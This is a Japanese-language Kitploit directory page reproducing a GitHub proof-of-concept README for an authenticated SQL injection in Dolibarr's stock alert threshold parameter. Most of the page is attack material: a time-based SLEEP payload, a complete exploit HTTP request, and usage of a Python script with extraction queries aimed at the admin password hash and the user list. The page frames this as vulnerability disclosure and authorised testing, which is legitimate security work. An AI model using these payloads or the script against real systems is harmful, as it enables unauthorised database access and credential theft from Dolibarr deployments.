Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-78804_Dolibarr_authenticated_SQL_injection — 各倉庫の在庫アラート閾値(`seuil_stock_alerte`)を設定するアクションは、ユーザー制御の入力を受け取り、その後、適切な数値キャストやパラメータバインディングなしにSQLクエリへ組み込んでいます。 #dolibarr #exploit | Kitploit
ツール/GitHubGitHub/repo4chu/cve-2026-78804_dolibarr_authenticated_sql_injection
脆弱性分析エクスプロイトスクリプトと自動化ウェブアプリケーション悪用ウェブセキュリティペネトレーションテストデータベースセキュリティ
GitHubrepo4chu/cve-2026-78804_dolibarr_authenticated_sql_injection

CVE-2026-78804_Dolibarr_authenticated_SQL_injection

各倉庫の在庫アラート閾値(`seuil_stock_alerte`)を設定するアクションは、ユーザー制御の入力を受け取り、その後、適切な数値キャストやパラメータバインディングなしにSQLクエリへ組み込んでいます。 #dolibarr #exploit

リポジトリを見る
18時間28分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Dolibarr — 認証済みSQLインジェクションPoC

seuil_stock_alerte パラメータを通じて製品在庫管理機能に影響を与えるSQLインジェクション。

影響を受けるバージョン

以下でテストおよび確認済み:

  • 19.0.4
  • 20.0.4
  • 21.0.4
  • 22.0.5
  • 23.0.3
  • 24.0.0 (報告時点まで動作していた。)

脆弱なパラメータ

seuil_stock_alerte

このパラメータは以下で受け入れられる:

root@kitploit:~
/product/stock/product.php

addlimitstockwarehouse アクションを使用する。

エクスプロイト

このパラメータは数値変換なしで取得される:

root@kitploit:~
$seuil_stock_alerte = GETPOST('seuil_stock_alerte');

$pse->seuil_stock_alerte = $seuil_stock_alerte;

その後、直接的な文字列連結を通じてSQL文に到達する:

root@kitploit:~
$sql .= ' seuil_stock_alerte = '.
    (isset($this->seuil_stock_alerte)
        ? $this->seuil_stock_alerte
        : "null").',';

値がクォートされていない数値コンテキストに挿入されるため、通常の数値の代わりにSQL式を指定できる。

時間ベースのブラインドSQLインジェクション

ブール値/時間ベースの式で実行を実証するのに十分である:

root@kitploit:~
(SELECT IF((1=1),SLEEP(15),0))

パラメータの例:

root@kitploit:~
seuil_stock_alerte=(SELECT IF((1=1),SLEEP(15),0))

リクエストが成功すると、HTTPレスポンスに約15秒の遅延が発生し、注入されたSQL式が評価されたことが確認される。

脆弱なリクエスト

脆弱なアクションは、以下のような認証済みリクエストで到達できる:

root@kitploit:~
POST /product/stock/product.php?id=1 HTTP/1.1
Host: target
Cookie: DOLSESSID_xxxxx=<session>
Content-Type: application/x-www-form-urlencoded

action=addlimitstockwarehouse&token=<csrf>&id=1&fk_entrepot=1&desiredstock=1&seuil_stock_alerte=(SELECT IF((1=1),SLEEP(15),0))

必要条件:

  • 有効な認証済みセッション
  • CSRFトークン (製品カードページから抽出)
  • 製品ID
  • 倉庫ID

認証と権限

この問題は、以下の権限のみを持つ認証済みアカウントで再現された:

root@kitploit:~
Product → Create (produit/creer)

権限 — 製品を作成できる低権限アカウント。

影響

このSQLインジェクションにより以下が可能になる:

  1. 時間ベースのブラインドSQLインジェクション — SLEEP遅延を通じてクエリを実行できる
  2. 情報漏洩 — データベースの内容を1文字ずつ窃取できる
  3. 潜在的な権限昇格 — 管理者認証情報や機密データの抽出
  4. データベース偵察 — エラーまたは時間ベースの手法によるスキーマ列挙

このシステムのデータベースレベルの制約により、直接的なOSコマンド実行は防止された。

エクスプロイトツール

付属のPoCスクリプト stock_sqli_poc.py はエクスプロイトプロセスを自動化する:

使用方法

root@kitploit:~
python3 stock_sqli_poc.py \
  --url http://127.0.0.1:8088 \
  --proxy http://127.0.0.1:8080 \
  --login webeditor \
  --password 'WebEdit0r!' \
  --product-id 1 \
  --warehouse-id 1 \
  --extract "(SELECT pass_crypted FROM llx_user WHERE admin=1 LIMIT 1)" \
  --length 14

機能

  • 自動ログイン — ターゲットに対して認証を行う
  • インジェクション確認 — テストペイロード (1=1 対 1=2) でSQLインジェクションを検証する
  • 二分探索抽出 — ASCII比較を使用してデータを1文字ずつ効率的に抽出する
  • プロキシサポート — Burp Suiteやその他のHTTPプロキシと統合する
  • 設定可能な遅延 — 信頼性のためにSLEEP時間を調整する

コマンドラインオプション

オプションデフォルト説明
--urlhttp://127.0.0.1:8088ターゲットのDolibarrインスタンスURL
--proxyhttp://127.0.0.1:8080HTTPプロキシ (Burpなど)。無効にするには空文字列を設定
--loginwebeditor低権限アカウントのユーザー名
--passwordWebEdit0r!アカウントのパスワード
--product-id1ターゲットとする製品ID
--warehouse-id1ターゲットとする倉庫ID
--delay1.0時間ベース検出のためのSLEEP時間 (秒)
--extract(SELECT pass_crypted FROM llx_user WHERE admin=1 LIMIT 1)窃取するSQL式
--length14抽出する最大文字数

抽出例

管理者パスワードハッシュを抽出:

root@kitploit:~
--extract "(SELECT pass_crypted FROM llx_user WHERE admin=1 LIMIT 1)"

ユーザーを列挙:

root@kitploit:~
--extract "(SELECT GROUP_CONCAT(login) FROM llx_user)"

データベースバージョン:

root@kitploit:~
--extract "VERSION()"

現在のデータベースユーザー:

root@kitploit:~
--extract "USER()"

⚠️ 法的通知: このエクスプロイトは、明示的な書面による許可を得たシステムに対してのみ使用してください。コンピュータシステムへの不正アクセスは違法です。このPoCは教育および許可されたセキュリティテスト目的でのみ提供されています。

ツールをダウンロード